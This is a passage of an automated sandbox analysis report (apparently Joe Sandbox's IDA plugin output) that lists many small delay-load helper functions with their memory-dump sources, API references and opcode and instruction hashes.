                                                                              • Associated: 00000009.00000002.1772935219.0000000000D20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773008826.0000000000D54000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D60000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D67000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D73000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D84000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773126393.0000000000D85000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_d20000_4.jbxd
                                                                              Similarity
                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                              • String ID:
                                                                              • API String ID: 1269201914-0
                                                                              • Opcode ID: f0709efe9864db7c3041343d4e6878101c498f02537c51e406ca9312b71631b0
                                                                              • Instruction ID: e4a43d2d36f1255f715bbf00dd7380536ae71491a28bf63ccf80d7d66f849214
                                                                              • Opcode Fuzzy Hash: f0709efe9864db7c3041343d4e6878101c498f02537c51e406ca9312b71631b0
                                                                              • Instruction Fuzzy Hash: D6B012856691067D3644A3143D07F3E121CC4C0B11730803FF845C4240D4904D0E5631
                                                                              Function 00D3F382 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00D3F33D
                                                                                • Part of subcall function 00D3F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D3FA5C
                                                                                • Part of subcall function 00D3F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D3FA6D
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1772962722.0000000000D21000.00000020.00000001.01000000.00000010.sdmp, Offset: 00D20000, based on PE: true
                                                                              • Associated: 00000009.00000002.1772935219.0000000000D20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773008826.0000000000D54000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D60000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D67000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D73000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D84000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773126393.0000000000D85000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_d20000_4.jbxd
                                                                              Similarity
                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                              • String ID:
                                                                              • API String ID: 1269201914-0
                                                                              • Opcode ID: 17c5c7b8c227d09dc57b9e3ea843f707541fba388d59b4fb0d2420de7325e082
                                                                              • Instruction ID: e98d884fcb3a5a4ef46e4bf79801181afa874193116f425340e10e11f00c3962
                                                                              • Opcode Fuzzy Hash: 17c5c7b8c227d09dc57b9e3ea843f707541fba388d59b4fb0d2420de7325e082
                                                                              • Instruction Fuzzy Hash: C1B012816691067D3644A3143C07F3E161CC4C0B11730C03FFC45C0240D4404C0D5631
                                                                              Function 00D3F38C Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00D3F33D
                                                                                • Part of subcall function 00D3F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D3FA5C
                                                                                • Part of subcall function 00D3F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D3FA6D
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1772962722.0000000000D21000.00000020.00000001.01000000.00000010.sdmp, Offset: 00D20000, based on PE: true
                                                                              • Associated: 00000009.00000002.1772935219.0000000000D20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773008826.0000000000D54000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D60000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D67000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D73000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D84000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773126393.0000000000D85000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_d20000_4.jbxd
                                                                              Similarity
                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                              • String ID:
                                                                              • API String ID: 1269201914-0
                                                                              • Opcode ID: 1ff7f5ee10112476bc97999c8685778ab48b1b0ddeb7244a01949ae491b5c73a
                                                                              • Instruction ID: b34d987bc05c696ebf7d318b95fe6a25056fa31499c293b9ae32efbcac9583c9
                                                                              • Opcode Fuzzy Hash: 1ff7f5ee10112476bc97999c8685778ab48b1b0ddeb7244a01949ae491b5c73a
                                                                              • Instruction Fuzzy Hash: 7CB012816692067D3684A3143C07F3E121CC4C0B11730813FF845C0240D4404C4D5731
                                                                              Function 00D3F3BE Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00D3F33D
                                                                                • Part of subcall function 00D3F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D3FA5C
                                                                                • Part of subcall function 00D3F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D3FA6D
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1772962722.0000000000D21000.00000020.00000001.01000000.00000010.sdmp, Offset: 00D20000, based on PE: true
                                                                              • Associated: 00000009.00000002.1772935219.0000000000D20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773008826.0000000000D54000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D60000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D67000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D73000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D84000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773126393.0000000000D85000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_d20000_4.jbxd
                                                                              Similarity
                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                              • String ID:
                                                                              • API String ID: 1269201914-0
                                                                              • Opcode ID: db5ef0e7811f44717a3f0dbc6ff4422a577d1adad5cc4128d9e6eed2931119a6
                                                                              • Instruction ID: 025b928fdbb55e587e39b406a8bfeaacb7cba4df37e3d90910357c990632a886
                                                                              • Opcode Fuzzy Hash: db5ef0e7811f44717a3f0dbc6ff4422a577d1adad5cc4128d9e6eed2931119a6
                                                                              • Instruction Fuzzy Hash: 5CB012956691067D3644A3143D07F3A121DC4C0B11730403FF840C4144D4804E0A5631
                                                                              Function 00D3F3A0 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00D3F33D
                                                                                • Part of subcall function 00D3F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D3FA5C
                                                                                • Part of subcall function 00D3F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D3FA6D
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1772962722.0000000000D21000.00000020.00000001.01000000.00000010.sdmp, Offset: 00D20000, based on PE: true
                                                                              • Associated: 00000009.00000002.1772935219.0000000000D20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773008826.0000000000D54000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D60000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D67000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D73000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D84000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773126393.0000000000D85000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_d20000_4.jbxd
                                                                              Similarity
                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                              • String ID:
                                                                              • API String ID: 1269201914-0
                                                                              • Opcode ID: 1db2b50d395a470f80713630cbd75697d7a9fddcae9187dd53663e069a3740de
                                                                              • Instruction ID: 42e2f4c7cfd460556dc33d05c3220adcf16fc3413493eafe79e9695a7ff40cc6
                                                                              • Opcode Fuzzy Hash: 1db2b50d395a470f80713630cbd75697d7a9fddcae9187dd53663e069a3740de
                                                                              • Instruction Fuzzy Hash: F0B01281669106BD3644A3543C07F3E131CC4C0F11730843FF845C0240D4404C0D5631
                                                                              Function 00D3F3AA Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00D3F33D
                                                                                • Part of subcall function 00D3F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D3FA5C
                                                                                • Part of subcall function 00D3F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D3FA6D
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1772962722.0000000000D21000.00000020.00000001.01000000.00000010.sdmp, Offset: 00D20000, based on PE: true
                                                                              • Associated: 00000009.00000002.1772935219.0000000000D20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773008826.0000000000D54000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D60000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D67000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D73000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D84000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773126393.0000000000D85000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_d20000_4.jbxd
                                                                              Similarity
                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                              • String ID:
                                                                              • API String ID: 1269201914-0
                                                                              • Opcode ID: 80178474ab2f2c38ed87a7474aea30e7622e37406157a65facf8f530be858e4d
                                                                              • Instruction ID: 450b6a62f9843599d230197b96c5a32f205c878aa84adea990f25877171fa5e8
                                                                              • Opcode Fuzzy Hash: 80178474ab2f2c38ed87a7474aea30e7622e37406157a65facf8f530be858e4d
                                                                              • Instruction Fuzzy Hash: 2EB012916691067D3644A3143C07F3E161DC4C0B11730803FFC40C0144D4404D095631
                                                                              Function 00D3F350 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00D3F33D
                                                                                • Part of subcall function 00D3F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D3FA5C
                                                                                • Part of subcall function 00D3F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D3FA6D
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1772962722.0000000000D21000.00000020.00000001.01000000.00000010.sdmp, Offset: 00D20000, based on PE: true
                                                                              • Associated: 00000009.00000002.1772935219.0000000000D20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773008826.0000000000D54000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D60000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D67000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D73000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D84000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773126393.0000000000D85000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_d20000_4.jbxd
                                                                              Similarity
                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                              • String ID:
                                                                              • API String ID: 1269201914-0
                                                                              • Opcode ID: 4883505489cc16c068eee2be8907c581bb9ed915ec8a75798f2d8a993080d676
                                                                              • Instruction ID: 77bb156fd4d6dc29891f03ce07785cc529e1adf11131053a6130981740c7aa02
                                                                              • Opcode Fuzzy Hash: 4883505489cc16c068eee2be8907c581bb9ed915ec8a75798f2d8a993080d676
                                                                              • Instruction Fuzzy Hash: 38B012C16792077D3644A3187C07F3A122CC4D0F11730413FF840C0144D4404C095A31
                                                                              Function 00D3F35A Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00D3F33D
                                                                                • Part of subcall function 00D3F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D3FA5C
                                                                                • Part of subcall function 00D3F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D3FA6D
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1772962722.0000000000D21000.00000020.00000001.01000000.00000010.sdmp, Offset: 00D20000, based on PE: true
                                                                              • Associated: 00000009.00000002.1772935219.0000000000D20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773008826.0000000000D54000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D60000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D67000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D73000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D84000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773126393.0000000000D85000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_d20000_4.jbxd
                                                                              Similarity
                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                              • String ID:
                                                                              • API String ID: 1269201914-0
                                                                              • Opcode ID: afaaf68bfdb09b727be27488920aa6ad3d02967e0f3cf19c8694ca2a020dcc4d
                                                                              • Instruction ID: 470cfe8f81c7aba79fa5660a89e05ebb841494e454008f49e4505ff42a01771b
                                                                              • Opcode Fuzzy Hash: afaaf68bfdb09b727be27488920aa6ad3d02967e0f3cf19c8694ca2a020dcc4d
                                                                              • Instruction Fuzzy Hash: 75B012856692067D3644A3143C07F3F165CC4C0B11734803FFC40C0140D4404C095731
                                                                              Function 00D3F346 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00D3F33D
                                                                                • Part of subcall function 00D3F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D3FA5C
                                                                                • Part of subcall function 00D3F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D3FA6D
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1772962722.0000000000D21000.00000020.00000001.01000000.00000010.sdmp, Offset: 00D20000, based on PE: true
                                                                              • Associated: 00000009.00000002.1772935219.0000000000D20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773008826.0000000000D54000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D60000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D67000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D73000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D84000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773126393.0000000000D85000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_d20000_4.jbxd
                                                                              Similarity
                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                              • String ID:
                                                                              • API String ID: 1269201914-0
                                                                              • Opcode ID: 938512a1a487e7b0e0d9c4f35ee1ad1f49e6dd9eeca3cf7a21ae5a0effe8fcbe
                                                                              • Instruction ID: a31ad471fef95d292c63367af0fea01799257376ea79f207be10b8299792bbd8
                                                                              • Opcode Fuzzy Hash: 938512a1a487e7b0e0d9c4f35ee1ad1f49e6dd9eeca3cf7a21ae5a0effe8fcbe
                                                                              • Instruction Fuzzy Hash: 04B012C56691077D3644A3587D07F3A122CC4D0B11730423FF840C4144D4804D0A5631
                                                                              Function 00D3F378 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00D3F33D
                                                                                • Part of subcall function 00D3F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D3FA5C
                                                                                • Part of subcall function 00D3F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D3FA6D
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1772962722.0000000000D21000.00000020.00000001.01000000.00000010.sdmp, Offset: 00D20000, based on PE: true
                                                                              • Associated: 00000009.00000002.1772935219.0000000000D20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773008826.0000000000D54000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D60000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D67000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D73000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D84000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773126393.0000000000D85000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_d20000_4.jbxd
                                                                              Similarity
                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                              • String ID:
                                                                              • API String ID: 1269201914-0
                                                                              • Opcode ID: fc7c6794ec7577dd83d3dbd1f55807de0062830eed5a10b19db7dfb5ecbe7ea6
                                                                              • Instruction ID: 793a46ff29ee687697754296b4f6029315e7eab2f780822cc0e90f2bbdba36b9
                                                                              • Opcode Fuzzy Hash: fc7c6794ec7577dd83d3dbd1f55807de0062830eed5a10b19db7dfb5ecbe7ea6
                                                                              • Instruction Fuzzy Hash: E8B0128566920A7D7644A3143C07F3B125CC4C0F11734403FF840C0140D4404C095731
                                                                              Function 00D3F364 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00D3F33D
                                                                                • Part of subcall function 00D3F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D3FA5C
                                                                                • Part of subcall function 00D3F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D3FA6D
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1772962722.0000000000D21000.00000020.00000001.01000000.00000010.sdmp, Offset: 00D20000, based on PE: true
                                                                              • Associated: 00000009.00000002.1772935219.0000000000D20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773008826.0000000000D54000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D60000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D67000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D73000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D84000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773126393.0000000000D85000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_d20000_4.jbxd
                                                                              Similarity
                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                              • String ID:
                                                                              • API String ID: 1269201914-0
                                                                              • Opcode ID: c62a3c430793301b15fb986daf6c308c1987717844e07ce80979087f0a7dc397
                                                                              • Instruction ID: 3c8c069e6cfad3cd3a786582b23aaf9ef623f5e268ff6e941d5461c9af33bfa0
                                                                              • Opcode Fuzzy Hash: c62a3c430793301b15fb986daf6c308c1987717844e07ce80979087f0a7dc397
                                                                              • Instruction Fuzzy Hash: C1B012856693067D3A84A3143C07F3B129CC4C0B11734413FF840C0140E4404C499731
                                                                              Function 00D3F32B Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00D3F33D
                                                                                • Part of subcall function 00D3F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D3FA5C
                                                                                • Part of subcall function 00D3F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D3FA6D
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1772962722.0000000000D21000.00000020.00000001.01000000.00000010.sdmp, Offset: 00D20000, based on PE: true
                                                                              • Associated: 00000009.00000002.1772935219.0000000000D20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773008826.0000000000D54000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D60000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D67000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D73000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D84000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773126393.0000000000D85000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_d20000_4.jbxd
                                                                              Similarity
                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                              • String ID:
                                                                              • API String ID: 1269201914-0
                                                                              • Opcode ID: 209b89d38797e00d69290e3ac630f8e68d208d6b813d75633e4a29bc9f1fe79b
                                                                              • Instruction ID: a04e627f4cba7f39c7c86ca938a39136cc7256d49cf8c3d701c1da5f656ba205
                                                                              • Opcode Fuzzy Hash: 209b89d38797e00d69290e3ac630f8e68d208d6b813d75633e4a29bc9f1fe79b
                                                                              • Instruction Fuzzy Hash: 50B0128166910B7E361463113C0BE3A121CC4D0F11730403FF840C0040E4404C095531
                                                                              Function 00D3F5A5 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00D3F556
                                                                                • Part of subcall function 00D3F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D3FA5C
                                                                                • Part of subcall function 00D3F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D3FA6D
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1772962722.0000000000D21000.00000020.00000001.01000000.00000010.sdmp, Offset: 00D20000, based on PE: true
                                                                              • Associated: 00000009.00000002.1772935219.0000000000D20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773008826.0000000000D54000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D60000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D67000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D73000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D84000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773126393.0000000000D85000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_d20000_4.jbxd
                                                                              Similarity
                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                              • String ID:
                                                                              • API String ID: 1269201914-0
                                                                              • Opcode ID: 0b77860e2dcc4569aac581f3c557fdc457a90f1d0004a6fcf49db544d77bd5c0
                                                                              • Instruction ID: f803fcf31516fa3e239f740c7d7988e338aa1f7d85d85e556d18a5ba78e34ebe
                                                                              • Opcode Fuzzy Hash: 0b77860e2dcc4569aac581f3c557fdc457a90f1d0004a6fcf49db544d77bd5c0
                                                                              • Instruction Fuzzy Hash: FBB012C16F80057F32046314BC13F3A010CC0C4B11730423BF880C1140D8418C081631
                                                                              Function 00D3F573 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00D3F556
                                                                                • Part of subcall function 00D3F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D3FA5C
                                                                                • Part of subcall function 00D3F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D3FA6D
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1772962722.0000000000D21000.00000020.00000001.01000000.00000010.sdmp, Offset: 00D20000, based on PE: true
                                                                              • Associated: 00000009.00000002.1772935219.0000000000D20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773008826.0000000000D54000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D60000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D67000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D73000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D84000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773126393.0000000000D85000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_d20000_4.jbxd
                                                                              Similarity
                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                              • String ID:
                                                                              • API String ID: 1269201914-0
                                                                              • Opcode ID: 1b36767edcf96c97110249277c6914995402aae07e4e791a1929edba623c46fd
                                                                              • Instruction ID: 3904f97a1f4729daadaa12d1f6f14445e57be81c901c506b9e51b9da8d524813
                                                                              • Opcode Fuzzy Hash: 1b36767edcf96c97110249277c6914995402aae07e4e791a1929edba623c46fd
                                                                              • Instruction Fuzzy Hash: C7B012C16E83047F370463147C03E3A018CC4C4B11734413AF880C1140E8408C4C6331
                                                                              Function 00D3F57D Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                              Download Yara Rule
                                                                              APIs
